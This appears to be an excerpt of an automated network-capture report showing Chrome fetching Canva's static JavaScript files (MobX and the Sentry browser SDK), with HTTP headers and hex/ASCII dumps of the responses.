                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 5b 6e 5d 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 62 28 65 29 26 26 21 30 3d 3d 3d 65 5b 6e 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 22 5b 6f 62 6a 65 63 74 20 4d 61 70 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 22 5b 6f 62 6a 65 63 74 20 53 65 74 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 76 61 72 20 43 3d 76 6f 69 64 20 30 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65
                                                                                                                                                                                                                                                                    Data Ascii: eturn t.prototype[n]=!0,function(e){return b(e)&&!0===e[n]}}function E(e){return null!=e&&"[object Map]"===Object.prototype.toString.call(e)}function O(e){return null!=e&&"[object Set]"===Object.prototype.toString.call(e)}var C=void 0!==Object.getOwnPrope
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 3f 7a 28 65 2c 74 29 3a 76 6f 69 64 20 30 7d 7d 28 65 29 29 7c 7c 74 26 26 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 65 6e 67 74 68 29 7b 6e 26 26 28 65 3d 6e 29 3b 76 61 72 20 72 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72
                                                                                                                                                                                                                                                                    Data Ascii: urn"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?z(e,t):void 0}}(e))||t&&e&&"number"==typeof e.length){n&&(e=n);var r=0;return function(){return r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 42 29 7c 7c 6b 28 65 2c 42 2c 49 28 7b 7d 2c 65 5b 42 5d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 61 6e 6e 6f 74 61 74 69 6f 6e 54 79 70 65 5f 3d 3d 3d 5a 7d 28 6e 29 7c 7c 28 65 5b 42 5d 5b 74 5d 3d 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 57 28 65 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6b 69 6e 64 7d 76 61 72 20 4b 3d 53 79 6d 62 6f 6c 28 22 6d 6f 62 78 20 61 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 22 29 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 22 41 74 6f 6d 22 29 2c 74 68 69 73 2e 6e 61 6d 65 5f 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 66 6c
                                                                                                                                                                                                                                                                    Data Ascii: B)||k(e,B,I({},e[B])),function(e){return e.annotationType_===Z}(n)||(e[B][t]=n)}function W(e){return"object"==typeof e&&"string"==typeof e.kind}var K=Symbol("mobx administration"),Q=function(){function e(e){void 0===e&&(e="Atom"),this.name_=void 0,this.fl


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    11192.168.2.1249729104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC795OUTGET /static/lib/sentry/7.16.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce6c880f60-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 1246816
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: W/"91258797204803263e4c46f8400f1bda"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:16 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 22:43:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-id-2: n/tgAv7nhdMK8+ZDRGJEaCxpKxVhLFJZMQK/5RvJNADTgttBr37iBiAAR/bcmMUlTegrHaZW7D4=
                                                                                                                                                                                                                                                                    x-amz-meta-vary: Origin
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 4BC7Q2FFFT5VZFJY
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: tozEOUZEBcqjRpGz85aK0Lg42bZme1w8
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlNj25oPELZPYPnrvBM6Kvxy5DBQmWIBaVRyz8fWN2XdJdxw6u7fU8rHk6ekY5CE27QCa5gk4xTtpjY2amAGN8FLlXju6HEFZWNPHM0180o5q60ZteLYck8TIrBx%2FoHwSGo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 37 66 66 61 0d 0a 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 36 2e 30 20 28 35 33 38 36 63 65 37 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: 7ffa/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 72 2e 70 75 73 68 28 60 5b 24 7b 74 5b 30 5d 7d 3d 22 24 7b 74 5b 31 5d 7d 22 5d 60 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 65 2e 69 64 26 26 72 2e 70 75 73 68 28 60 23 24 7b 65 2e 69 64 7d 60 29 2c 69
                                                                                                                                                                                                                                                                    Data Ascii: ,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forEach((t=>{r.push(`[${t[0]}="${t[1]}"]`)}));else if(e.id&&r.push(`#${e.id}`),i
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6f 2c 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 77 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 24 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 22 22 3b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b
                                                                                                                                                                                                                                                                    Data Ascii: o,protocol:e,publicKey:r})}(t):w(t)}const S=["debug","info","warn","error","log","assert","trace"];function $(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n)}...`}function x(t,n){if(!Array.isArray(t))return"";const e=[];for(let n=0;
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 52 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 24 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c 65 6e 67 74 68 3e 6e 29 29 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 6c 65 6e 67 74 68 3f 72 3a 24 28 72 2c 6e 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 29 7b 72 65 74 75 72 6e 20 41 28 74 2c 6e 65 77 20
                                                                                                                                                                                                                                                                    Data Ascii: onst e=Object.keys(R(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return $(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.length>n))return t===e.length?r:$(r,n)}return""}function N(t){return A(t,new
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 75 72 6e 20 6e 65 77 20 48 65 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 6f 6e 73 74 20 46 3d 7b 7d 2c 42 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 69 66 28 21 42 5b 74 5d 29 73 77 69 74 63 68 28 42 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21
                                                                                                                                                                                                                                                                    Data Ascii: urn new Headers,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function H(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}const F={},B={};function X(t){if(!B[t])switch(B[t]=!0,t){case"console":!
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 79 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 6b 28 74 2c 22 6f 70 65 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2c 72 3d 6e 5b 31 5d 2c 69 3d 65 2e 5f 5f 73 65 6e 74 72 79 5f 78 68
                                                                                                                                                                                                                                                                    Data Ascii: try_instrumentation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in y))return;const t=XMLHttpRequest.prototype;k(t,"open",(function(t){return function(...n){const e=this,r=n[1],i=e.__sentry_xh
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 44 61 74 61 3a 7b 6d 65 74 68 6f 64 3a 4a 28 6e 29 2c 75 72 6c 3a 4b 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 79 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 29 29 7d 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 73 74 6f 72 79 22 3a 21 66
                                                                                                                                                                                                                                                                    Data Ascii: Data:{method:J(n),url:K(n)},startTimestamp:Date.now()};return W("fetch",{...e}),t.apply(y,n).then((t=>(W("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw W("fetch",{...e,endTimestamp:Date.now(),error:t}),t}))}}))}();break;case"history":!f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 47 45 54 22 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 74 3d 5b 5d 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 79 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 47 3b 6c 65 74 20 56 2c 51 3b 66 75 6e 63 74 69 6f 6e 20 59 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 51 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6b 65 79 70 72 65 73 73 22 21 3d 3d 74 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 6e 7c 7c 21 6e 2e 74 61 67 4e 61
                                                                                                                                                                                                                                                                    Data Ascii: GET"}function K(t=[]){return"string"==typeof t[0]?t[0]:"Request"in y&&h(t[0],Request)?t[0].url:String(t[0])}let G;let V,Q;function Y(t,n=!1){return e=>{if(!e||Q===e)return;if(function(t){if("keypress"!==t.type)return!1;try{const n=t.target;if(!n||!n.tagNa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 65 3d 65 74 28 74 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 72 3d 65 2e 6d 65 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 29 7b 69 66 28 74 26 26 74 2e 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 4f 28 74 2c 22 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 22 2c 21 30 29 7d 63 61 74 63 68 28 74
                                                                                                                                                                                                                                                                    Data Ascii: e=et(t);if(!e)return;const r=e.mechanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function ot(t){if(t&&t.__sentry_captured__)return!0;try{O(t,"__sentry_captured__",!0)}catch(t


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    12192.168.2.1249730104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC563OUTGET /web/7aa7a229de4ac1cc.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1344INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:31 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 158080
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950d9492542ad-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 49971
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "750703f7d42e2fe0f2fc289cdc8aa4db"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:17 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:18 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 3pvasdS1I3N3UEJs4Zs0PPmE+ukU+cbbPANe+Uv2op8eFiBloLrCbE9gv4FHfz+PtBrjNDZHQma6lvbNvryiwMV21XeevRFV
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: C6N5W9QHGWRE4T9T
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: J4xT7IxG6N65wSHmHY0DCpfdQj59MGhV
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC810INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 79 7a 67 31 76 63 4b 64 57 6f 62 31 38 73 76 36 7a 6d 58 34 6c 77 31 68 47 6d 30 30 68 6e 6d 66 36 4a 7a 4e 5f 66 31 71 4a 4f 59 2d 31 37 33 32 31 31 34 38 39 31 2d 31 2e 30 2e 31 2e 31 2d 4d 52 30 6a 75 42 46 71 37 6d 6e 43 31 4a 77 38 49 4b 65 70 79 51 47 49 67 73 34 41 6a 5f 74 35 4c 31 33 73 5a 71 70 59 64 6b 42 4b 4e 6c 51 4c 6c 4d 41 5f 53 61 6a 65 32 61 70 72 51 56 66 34 6b 63 41 66 6e 58 71 75 2e 6e 51 6e 45 4f 68 5a 74 66 56 32 67 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                    Data Ascii: X-Content-Type-Options: nosniffSet-Cookie: __cf_bm=yzg1vcKdWob18sv6zmX4lw1hGm00hnmf6JzN_f1qJOY-1732114891-1.0.1.1-MR0juBFq7mnC1Jw8IKepyQGIgs4Aj_t5L13sZqpYdkBKNlQLlMA_Saje2aprQVf4kcAfnXqu.nQnEOhZtfV2gQ; path=/; expires=Wed, 20-Nov-24 15:31:31 GMT; domain
